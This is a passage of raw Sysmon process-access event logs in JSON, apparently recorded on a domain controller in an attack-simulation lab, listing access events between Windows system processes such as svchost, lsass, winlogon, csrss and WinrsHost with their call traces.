06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2516,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2517,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2518,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.317\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.317","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2519,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2520,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+7c8b|c:\\windows\\system32\\lsm.dll+396a|c:\\windows\\system32\\SYSNTFY.dll+1fc3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+598d8|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+7c8b|c:\\windows\\system32\\lsm.dll+396a|c:\\windows\\system32\\SYSNTFY.dll+1fc3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+598d8|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2521,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.317\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-00108E750400}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.317","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-00108E750400}","TargetProcessId":"4204","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2522,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.317\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.317","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2523,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.317\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 600\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010BE6F0400}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.317","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"600","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010BE6F0400}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2524,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.317\r\nSourceProcessGUID: {E2A3D6B1-1083-5F25-0000-00108E750400}\r\nSourceProcessId: 4204\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-001091730400}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 